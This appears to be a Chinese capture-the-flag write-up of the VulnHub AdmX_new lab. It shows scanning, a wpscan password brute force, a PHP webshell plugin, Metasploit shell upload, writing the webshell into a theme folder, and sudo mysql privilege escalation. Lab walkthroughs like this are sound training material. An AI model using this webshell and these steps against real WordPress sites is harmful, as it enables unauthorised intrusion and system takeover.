靶机-AdmX_new

AdmX_new

环境搭建

靶场地址:
https://download.vulnhub.com/admx/AdmX_new.7z
kali攻击机ip:192.168.12.144
靶机ip:192.168.12.171

一、信息收集

1.主机发现,发现靶机ip:192.168.12.171

arp-scan -l

在这里插入图片描述
2.对靶机ip进行端口扫描,只开放一个80端口

 nmap -sS -sV -T4 192.168.12.171 -p-

在这里插入图片描述
3.访问80端口
在这里插入图片描述

二、漏洞挖掘

1.对目标站点进行目录扫描,发现wordpress目录

dirsearch -u "http://192.168.12.171/" 

在这里插入图片描述
2.对目录进行访问查看

在这里插入图片描述
在这里插入图片描述
发现页面访问缓慢,F12进行查看,发现对ip192.168.159.145进行请求,没有这个ip
在这里插入图片描述
利用bp将这个ip进行替换成靶机IP,到Proxy下的Options下的Match and Replace,先把里面的所有内容Remove掉。再点击Add
在这里插入图片描述
在这里插入图片描述

3.利用wordpress的工具进行扫描

wpscan --url http://192.168.12.171/wordpress 

在这里插入图片描述
4.利用工具直接对wordpress后台密码进行爆破,admin/adam14

wpscan --url http://192.168.12.171/wordpress/ -P ./User_Pwds.txt -U admin

在这里插入图片描述
5.访问登录页面进行登录admin/adam14

在这里插入图片描述

三、漏洞利用

1.wordpress后台漏洞利用,写个php的插件,WordPress需要压缩成zip格式

<?php /** * Plugin Name: Webshell * Plugin URI: https://zhangd.github.io * Description: WP Webshell for Pentest * Version: 1.0 * Author: ZhangD * Author URI: https://zhangd.github.io * License: https://zhangd.github.io */ if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>

2.上传文件,下载失败

在这里插入图片描述
3.利用msf进行获取shell

use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.12.171
set username admin
set password adam14
set targeturi /wordpress
run

在这里插入图片描述
4.进入shell
在这里插入图片描述
5.切换到bash下,之后将木马写入到网站的目录之下

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd /var/www/html/wordpress/wp-content/themes/twentytwentyone

echo '<?php /** * Plugin Name: Webshell * Plugin URI: https://zhangd.github.io * Description: WP Webshell for Pentest * Version: 1.0 * Author: ZhangD * Author URI: https://zhangd.github.io * License: https://zhangd.github.io */ if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>' > 11.php

在这里插入图片描述
6.再网页进行访问
在这里插入图片描述

四、提权

1.查看wordpress的配置文件,发现账户和密码

目录:/var/www/html/wordpress
账户和密码:admin/Wp_Admin#123

cat wp-config.php

在这里插入图片描述
2.尝试登陆数据库失败,尝试直接切换用户wpadmin/adam14进行登陆
在这里插入图片描述
3.尝试sudo提权

在这里插入图片描述
4.登录数据库,密码:adam14,通过mysql的system指令执行系统命令

sudo /usr/bin/mysql -u root -D wordpress -p

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值